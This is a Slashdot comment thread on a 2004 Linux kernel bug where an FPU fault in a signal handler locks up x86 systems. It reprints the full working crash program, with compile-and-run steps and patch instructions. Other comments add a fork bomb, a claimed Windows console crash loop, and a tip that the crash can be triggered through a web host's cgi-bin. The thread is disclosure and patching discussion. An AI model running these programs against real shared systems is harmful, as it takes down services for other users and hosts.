Slashdot Mirror


New Linux Kernel Crash-Exploit discovered

Ant writes " According to linuxreviews article's on 6/11/2004, there is a nasty bug that lets a simple C program crash the kernel (2.4.18-2.6.x reported so far), effectively locking the whole system. Affects both 2.4.2x and 2.6.x kernels on the x86 architecture. This exploit can be compiled and run without a root access and with a shell access. There are detailed information and source code mentioned. " You need to have shell access to run this program; it's also worth noting that not *all* flavors are vulnerable. Please read article for the full details.

38 of 691 comments (clear)

  1. Re:The best way to avoid this bug by Anonymous Coward · · Score: 0, Informative

    RTFA! The bug only works on the x86 platform, so thus buying a mac and running Linux on it would get around the bug!
    Parent might be a troll or flamebait, but not off-topic!

  2. if you're running 2.4.25 or 2.4.26 by Anonymous Coward · · Score: 4, Informative

    here's a direct link to the patch.

    not whoring. ;)

    1. Re:if you're running 2.4.25 or 2.4.26 by 13Echo · · Score: 2, Informative

      This crash most definitely works. I tested it on my freshly built 2.6.6 kernel and it locked the whole machine up; just totally freezes it. This was as a standard user.

      I suppose it is not a problem since I don't allow shell access to my machines, but I guess it wouldn't hurt to patch anyway.

  3. The problem appears to be... by Ayanami+Rei · · Score: 5, Informative

    ... that if you trigger a floating point exception inside a signal handler (specifically SIGALRM), the kernel doesn't handle it correctly, hanging the system. It appears to affect both SMP and UP kernels.

    Some questions I have to those who may have been following this:

    Does the crash occur without the syscalls in the signal handler/main process?
    Does the crash occur on SMP machines?
    Does the crash occur with other signals (PIPE, USR1, etc.)
    Does the crash occur on ppc, sparc, etc?

    --
    THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
    1. Re:The problem appears to be... by log2.0 · · Score: 2, Informative

      Most of those questions are answered in the article.

      --
      Can your karma go above being Excellent?
    2. Re:The problem appears to be... by Ndiin · · Score: 2, Informative

      I can confirm that this does occur on SMP systems, but it requires two instances. The first run of the program locks up one of the CPUs completely, and cannot be killed. The second kills the entire machine.

      This is on 2.4.25

      -- Ndiin

  4. Real crash.txt info and fix by bigdady92 · · Score: 2, Informative

    #include
    #include
    #include

    static void Handler(int ignore)
    {
    char fpubuf[108];
    __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
    write(2, "*", 1);
    __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
    }

    int main(int argc, char *argv[])
    {
    struct itimerval spec;
    signal(SIGALRM, Handler);
    spec.it_interval.tv_sec=0;
    spec.it_interval.tv_usec=100;
    spec.it_value.tv_sec=0;
    spec.it_value.tv_usec=100;
    setitimer(ITIMER_REAL, &spec, NULL);
    while(1)
    write(1, ".", 1);

    return 0;
    }

    Using this exploit to crash Linux systems requires the (ab)user to have shell access. The program works on any normal user account, root access is not required. This exploit has been reported used to take down several "lame free-shell providers" servers (this is illegal in most parts of the world and strongly discouraged).

    This code only works on x86 Linux machines. This code does not compile (makes no executable) on sparc64 sun4u TI UltraSparc II (BlackBird). This doesn't affect NetBSD Stable.

    Check your own system yourself if you are wondering if this affects you. Better safe than sorry. Assume it will crash, sync (even unmount) your file systems before testing. If your system is a production server with 1000 on line users then do not test this code on that box.

    How to protect yourself

    The last days were frustrating. Compiling a large number of different kernel versions just to find that gcc crash.c -o evil && ./evil halts the system is quite dull. I hoped some kernels would be unaffected because 2.4.26-rc3-gentoo and 2.4.26_pre6-gentoo are, but sadly almost all kernels versions die when evil is executed.

    The Linux Kernel mailing list is found to the right of this article. You may find solutions there not mentioned on this page. The author does subscribe and plans to post (better) solutions here as they appear.

    Patch for 2.4.2x (vanilla) Kernels
    Stian Skjelstad mailed me a working patch 2.4 kernels.

    2.4.26

    I applied it, confirmed that it works with the vanilla 2.4.26 kernel and made a diff (diff -ur linux-2.4.26/kernel/signal.c linux-2.4.26-x/kernel/signal.c > signal.c-2.4.26.patch.txt). (signal.c-2.4.26.patch.txt)

    1. Read the Kernel Rebuild Guide if this is your first time compiling your own kernel
    2. Download linux-2.4.26.tar.bz2 from your local Linux Kernel Mirror
    3. Unpack the kernel source and make a symbolic link:
    * cd /usr/src/
    * tar xfvj linux-2.4.26.tar.bz2
    * ln -s linux-2.4.26 linux
    4. Download the patch for 2.4.26: signal.c-2.4.26.patch.txt
    5. Apply the patch
    * patch -p1 -d /usr/src/linux-2.4.26 signal.c-2.4.21.patch.txt) is tested and works for Kernel 2.4.21 (vanilla).

    1. Get a vanilla 2.4.21 kernel and install it.
    2. Apply the patch
    * patch -p1 -d /usr/src/linux-2.4.26 2.4.26-rc3-gentoo.

    I have no idea why this kernel version is safe from this exploit. It just is. This kernel patch set returns Floating point exception instead of locking the system when evil is executed.

    This kernel can be used on any Linux system. It does not require any Gentoo-only tools.

    1. Read the Kernel Rebuild Guide if this is your first time compiling your own kernel
    2. Download linux-2.4.25.tar.bz2 from your local Linux Kernel Mirror
    3. Get the patch set for Gentoo 2.4.26-rc3-gentoo (mirror1) (mirror2) aka 2.4.26_pre5:
    * wget http://re.a.la/gs (2,2M)
    4. Unpack the 2.4.25 kernel source:
    * cd /usr/src/
    * tar xfvj linux-2.4.25.tar.bz2
    5. Apply the Gentoo patchset:
    * patch -p1 -d /usr/src/linux-2.4.25 "EXTRAVERSION = -rc3-gentoo"
    8. Configure your kernel
    * Using your old config: cp /usr/s

    --
    Wheel of Time: Book by Book and Sumview (summary review) Bigdady92 style: http://bigdady92.blogspot.com/
  5. I read the article too, I'm an idiot. by Ayanami+Rei · · Score: 4, Informative

    The article says it affects x86 (and x86-64) only.

    So itanium, ppc, etc. are safe. But my other questions still remain.

    Note that the person who reported the bug thought they were triggering a gcc bug. As it turns out, he munged his FPU assembly instructions.
    The GCC people rightly told him to contact the lkml... it's definitely an exception handling issue.

    --
    THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
  6. You do NOT need shell access by Anonymous Coward · · Score: 3, Informative

    This can be executed on any webhost with ftp access and a cgi-bin.

  7. Re:Fixed quickly. by kaiidth · · Score: 5, Informative
    Patch is here on LKML. And of course it is on the original exploit page too.

    Here is the LKML discussion thread on the subject. It's an interesting bug, briefly summarised by Matt Mackall as follows:

    The example code's bogus
    asm is generating an FPU fault in frstor in its signal handler, that's
    bumping us into math_error -> force_sig_info ->
    specific_send_sig_info. Then we hit:

    if (LEGACY_QUEUE(&t->pending, sig))

    which decides we don't need to send the signal after all and we bail
    all the way back out and recurse.


    So there's a bit of a massive problem with FPU exception handling, which didn't come to light before. Wheee. Fun.
  8. Re:Who has shell access? by Ctrl-Z · · Score: 2, Informative

    Universities.

    --
    www.timcoleman.com is a total waste of your time. Never go there.
  9. Older gcc-versions also vulnerable by kghougaard · · Score: 3, Informative

    FYI... My RH7.3 with gcc 2.96 and a 2.4.20 kernel is also vulnerable.

    --
    He, who dies with the most toys, wins
  10. Re:Who has shell access? by afidel · · Score: 2, Informative

    I have shell on my old dialup ISP's Sun machines, have for over a decade now. Many shared webhosting farms run on Linux on x86 and if you have CGI you basically have shell since you can run arbitrary code. Also any place that does development work under Unix probably gives their developers shell access (duh). So I would say there are a lot of places that give more than just the inner circle monks of IT shell access.

    --
    There are 4 boxes to use in the defense of liberty: soap, ballot, jury, ammo. Use in that order. Starting now.
  11. Re:There's a big difference... by AntiChris · · Score: 2, Informative
    You know why? They don't care, they don't want to "break" anything, or they don't even know that the little icon in their taskbar is any different from their 1000 other ones in the tray.

    That's right... they don't want to break the CometCursor, KaZaa, download managers, money savers, and other malware etc that are in the tray... then they wonder why their computers always crash and blame it on Microsoft.
    I work as an IT Director for a real estate company and as a tech for Best Buy and at BB we've started a tally for the highest number of malware found by AdAware... I think the highest was well over 5000!!! Needless to say we recommended a restore O_o
    -
    --
    From 0 to drunk in $20
  12. Uh oh... by Anonymous Coward · · Score: 1, Informative

    Beware of patch.

    It could be another Linux Kernel 2.4.11

  13. Not all... (read for more info) by Ayanami+Rei · · Score: 2, Informative

    The article doesn't attempt to explain anything.

    (Someone please correct me if I have this wrong)

    After poking around in the LKML, I've mostly figured it out.
    The kernel wasn't handling floating point exceptions correctly in the signal handler. The problem is that if the exception is triggered by the LAST instruction in the handler, the exception is attempted to be delivered to a signal context which no longer exists. The same thing was happening with execve... if you triggered it right before the execve syscall, the application context would be destroyed, and the pending exception would be pointing to a non-existant instruction. The exception handler would jump off into space trying to deliver SIGFPE...

    So they changed __clear_fpu (which is called when doing a initial switch back to user space [I think]) to clear any pending FPU exceptions, because there was no way they could be handled anyway.

    Missing an FPU exception doesn't sound so bad. I think someone was posting a better solution, which would attempt to handle it the right way... (I didn't really follow the more extensive patch, anyone care to explain?)

    --
    THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
  14. Re:There's a big difference... by the_mad_poster · · Score: 4, Informative

    Yea, the only difference is that in OSS the steps are usually covered in about a third the time.

    This hit the kernel-list dated 2004-06-09 21:02:57 . It is now 2004-06-14 09:41:12 in my neck of the woods, and it is patched. The last update mentioned on the article's page is yesterday. It would appear the patch was available in no more than 4 days. It takes more than four days for a lot of vendors just to look at the goddamn report. Then they spend the next week hoping it goes away on it's own. Then they ignore the follow ups. Two months later when the submitter has had enough, they go to FULL DISCLOSURE and the vendor gets pissed off and starts attacking the person who reported it for not giving them enough time to write a patch they haven't even started on. Then they spend another month making lousy excuses for why it's not a serious issue and half assed suggestions of what you can turn off to avoid the problem. Finally, after about four months of hand wringing, press releases, and general bullshit, you might get a patch. If you're lucky, it won't require you to start the process over again by introducing a brand new vulnerability. If you're lucky.

    There's a huge difference here. The Linux folks jumped up and solved the problem. They didn't sit around pissing on their hands for months and making excuses like a lot of vendors do.

    --
    Alito: A vote for Alito is a punch in the eye to put that bitch back in her place!
  15. Re:There's a big difference... by Fizzol · · Score: 2, Informative

    In defence of the article "lame free-shell provider" is presented in quotes, it's not the website or the author using the term. It's a quote from the perpetrator. There's no connection to open source.

  16. Re:UML? by bluelip · · Score: 4, Informative

    Talked about on the mailing lists.

    http://marc.theaimsgroup.com/?l=linux-kernel&m=1 08 695598318818&w=2

    Says session just dies. Host is OK.

    --

    Yep, I never spell check.
    More incorrect spellings can be found he
  17. Re:In case of slashdotting by Anonymous Coward · · Score: 1, Informative
    #include <stdio.h>

    int main() {
    for(;;) printf("\t\t\b\b\b\b\b");
    }
  18. Re:There's a big difference... by Anonymous Coward · · Score: 2, Informative

    Doesn't crash my win2k pro box. I'm all for slagging off MS, but lets do it with real bugs eh?

  19. Re:There's a big difference... by Allen+Zadr · · Score: 5, Informative
    A well patched system, Linux or Windows, doesn't need a firewall.

    "WHAT YOU SAY!?"

    I run a corporate network without a firewall. Every time a major issue comes around and destroys every freaking company around me, I go by with maybe two systems effected. Why? I stay up-to-date on all patches, and I keep relatively SANE security policies in place.

    A firewall is a lot less necessary than firewall vendors would have you believe. My experience is that firewalls breed a false sense of security. Someone goes home over the weekend with a laptop - and comes back with a zombie virus/worm/etc. that goes and infects everything while the IT department is "taking their time" evaluating a security update for a month (I do 24 hour tests).

    Why not firewall, is the other thing I hear. Mostly, it's so that every one of my systems can be an internet service provider. That's what the internet is about. Enabling users to say, hey - I've got that file right here on my local FTP, come get it. Here, log onto my VNC desktop, and I'll show you.

    Firewalls create industries like WebEx. Because technology has come from 'wow, I didn't know you could do that,' to, 'I didn't know you could do that because I'm firewalled.'

    Finally, "It doesn't happen very often," quite clearly means that it has happened. Call it pre-teen style bitching if you will, but a lawsuit should have never been threatened (AFAIK, a lawsuit never actually went to court). Is someone finds a vulnerability, full disclosure should not be the only method to have Microsoft take you seriously. My teen years are LONG behind me, maybe I'm just sick of having to deal with Microsoft's crap since Windows for Workgroups 3.11 (when the problems started for me).

    --
    Kinetic stupidity has a new brand leader: Allen Zadr.
  20. IGNORE above ... new info. by Ayanami+Rei · · Score: 4, Informative

    God I wish I could edit posts.

    The issue isn't that the context is gone... the issue is that the kernel is executing a non-waiting FPU instruction i.e. "fwait" on returning from the a context that flushes a user thread (i.e. return from signal handler, syscall after execve). Triggers the FPE, except the kernel isn't set up to handle FPEs properly from kernel space in this case. The problem is that the TS flag is set because it's switching tasks, so it receives a different exception, trap 7 (device_not_available). The purpose of that exception is to signal the kernel that a newly created process wants the FPU. So it attempts to set up the FPU... which ends up calling __clear_fpu again... heh... and the original exception isn't cleared yet... whoops.

    What's really weird is I found this document, which details the potential problems of trying to use the FPU in a interrupt handler in the Linux kernel.

    They brought up the potential of triggering this EXACT PROBLEM... quote "endless trap 7 activation"... only in this case they're talking about writing an interrupt routine, not returning from a signal handler. Still, they already discovered this misbehavior...

    Well, you can't really call it that, though. It's was sort of by design (to make task switching faster). But the thing is you have to be ABSOLUTELY SURE that you never raise an FPE when TS is set, and you're NOT a user thread. That's what gets you burned here.

    --
    THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
  21. Re:Fixed quickly. by Hiro+Antagonist · · Score: 3, Informative

    The thing about Windows bugs is that many of them are remotly exploitable by unprivileged users; in order to exploit bugs like this, and in fact any root compromise that I know of, you need to first get a shell on the machine. Much harder than throwing up a web page or sending out a trojaned email.

    --

    --
    I Hit the Karma Cap, and All I Got Was This Lousy .sig.
  22. Re:OT: Bugtraq auto-unsubscribe? by Anonymous Coward · · Score: 1, Informative

    You are probably refusing "virus-infected" messages.

  23. A good time to disable compiler access by nacs · · Score: 2, Informative
    This is definitely not a fix for this exploit but if you're running a server where you have given shell access to a few people (like on a hosting server), this would be a good time as ever to limit compiler access.

    Here's how:

    Add compiler group:
    /usr/sbin/groupadd compiler

    Move to correct directory:
    cd /usr/bin

    Make most common compilers part of the compiler group
    chgrp compiler *cc*
    chgrp compiler *++*
    chgrp compiler ld
    chgrp compiler as

    Set permissions
    chmod 750 *cc*
    chmod 750 *++*
    chmod 750 ld
    chmod 750 as

    To add users to the group, modify
    /etc/group
    and change
    compiler:x:123:
    to
    compiler:x:123:username1,username2
    '123' will be different on your installation.

    Again, don't think this is a fix for the exploit. It's just a good little step in securing a box.
    --
    "I filter at +6, and have yet to miss out on an important comment." (#822545)
  24. Re:There's a big difference... by Anonymous Coward · · Score: 2, Informative

    Yeah, well, the so-called "tin-foil-hat crowd" has noticed the fact that autoupdate on windows XP is crap. Have you ever compared the list of updates it gets for you, to the list on the actual windows update site? I've had cases where there were 2-3 more critical updates that autoupdate didn't download.

    It also doesn't help that it won't autoupdate service packs, causing everything after the service pack to just not show up, without autoupdate even notifying you that there is a service pack to manually download and install.

    And way back when the slammer worm was big news, autoupdate got the patch to me the week after it made /. (complete with people griping that the patch was out "months ago"). And then got the patch again every day for the next 4 days.

    Tin foil and conspiracy theory has nothing to do with the fact that I no longer trust autoupdate.

  25. Re:There's a big difference... by zsau · · Score: 4, Informative

    Didn't work for me. I just get a white screen in the middle of the command prompt with a purple border that says in purple 0: PING 192.168.0.7. Pressing Enter runs ping a couple times.

    I'm far from a Windows fanboy. I use Linux almost all the time... I just happened to have a Windows box on my network atm.

    --
    Look out!
  26. Re:Must be ANSI SLASHDOT C by Anonymous Coward · · Score: 1, Informative
    argc and argv are not necessary to be ANSI. EXIT_SUCCESS is defined as:
    #define EXIT_SUCCESS 0
    Thus, returning zero is perfectly acceptable.

    Where does it say in the standard that you have to explicitly call EXIT_SUCCESS?
  27. Re:This is another reason why C should be deprecat by rendler · · Score: 3, Informative
    From the perlfaq1 man page:
    What's the difference between "perl" and "Perl"?

    One bit. Oh, you weren't talking ASCII? :-) Larry now uses "Perl" to signify the language proper and "perl" the implementation of it, i.e. the current interpreter. Hence Tom's quip that "Nothing but perl can parse Perl." You may or may not choose to follow this usage. For example, parallelism means "awk and perl" and "Python and Perl" look OK, while "awk and Perl" and "Python and perl" do not. But never write "PERL", because perl is not an acronym, apocryphal folklore and post-facto expansions notwithstanding.
    Some people are pedantic about these sorts of things. Personally my only spelling pet peeve is seeing people use 'alot'.
    --

    *shrug*
  28. FYI suse 9.1 not vulnerable by sloanster · · Score: 4, Informative

    Granted, this crashme program, which requires local shell access, does seem to work in some cases.

    However, it does not do so on suse linux 9.1 - it creates an unkillable process, but the system continues to run normally.

  29. Re:There's a big difference... by MachineShedFred · · Score: 2, Informative

    As for your Win2k 'sploit, I call bullcrap. Doesn't work, but a nice command history comes up, so I'll thank you for that tip.

    Oh, and saying that local exploits aren't taken seriously is both a major understatement, and a not-so-major problem. After all, you can fix all the Denial-of-Service exploits you want, but if someone has local access to the machine, they can always pull out the power cord.

    That is not easily fixed with an OS patch. Never underestimate the use of a heavy door and good locks.

    --
    Slashdot still doesnâ(TM)t support Unicode after it was added to the HTML standard in 1997.
  30. Re:Not news. by multi+io · · Score: 3, Informative
    There are 1,001 ways to crash a linux kernel with access to a shell. Save some keystrokes and give:
    for(;;)
    {
    malloc(1);
    fork();

    }

    help ulimit

  31. RHEL3 doesn't crash by photon317 · · Score: 1, Informative


    Tested their code on Redhat ES 3.0 with all current updates applied (2.4.21-15.ELsmp - they haven't released any new kernel updates specific to this problem). The process will suck up a cpu spinning in a tight loop, and is unkillable (even as root with kill -9), but it does not crash the system.

    Redhat seems to have different code in signal.c around the area the signal.c patch mentions, but does not have the i387.h patch.

    --
    11*43+456^2
  32. [CORRECTION] Re:RHEL3 doesn't crash by photon317 · · Score: 4, Informative


    My test was on a dual P4 (hyperthreading). Running a single instance of the code only locked a single cpu. I just played with it again, and running 4 instances locked the box. So RHEL3 is vulnerable, and a correct description of the problem is that the exploit locks up 1 cpu in an endless loop that cannot be stopped. For systems with multiple CPUs, you have to do this once for each cpu (twice for each physical cpu if hyperthreading) in order to lock the whole box up.

    --
    11*43+456^2
  33. Re:nonzero: It's not just for game thory anymore! by grahamlee · · Score: 2, Informative
    I was using the term in a sociological context, bub.

    The name's grahamlee. I was using a word from the english language and taking it to mean that which is its accepted meaning. It's even written as such in the dictionaries.

    BTW, since you're so well versed in engineering and it's terminology I'm sure you know that all computers built since the dawn of time (computing) to this day are said to use a "Von Neumann architecture"?

    That's a load of rubbish; all computers since the dawn of time have certainly not been exclusively von Neumann computers (as distinct from von Neumann machines, of course). Note all of the computers that employ the Harvard architecture. And I doubt you can conveniently ignore those unless you never ever intend to use a DSP (ever). The Harvard architecture is named after the Harvard Mark I (a.k.a. IBM ASCC), and one of its programmers was a certain Grace Hopper. She went on to big things, you know.

    Von Neumann was a mathematical genius, the father of the modern computational model and the original pioneer of game theory.

    You mean Neumann János? [I'm not happy that a paid-for title should necessarily be honoured.] I wonder whether he was able to see the word 'nonzero' written down without trying to invent a new meaning for it....probably. Anyway, the achievements or otherwise of a Hungarian mathematician have little bearing on your version of the word nonzero's definition, which of course comes from the Old French / Latin prefix "non-" and the Arabic "çifr". Not that your definition isn't necessarily valid in some field, I'm sure it is. It's just that the previous (c. 1879) definition already has a lot of inertia everywhere else, because people know that that is what the word means.

  34. Re:In case of slashdotting by Transcendent · · Score: 2, Informative

    That actualy doesn't work anymore... unless you haven't patched Win2k?

    Also... that's a problem with printf() mainly... not windows.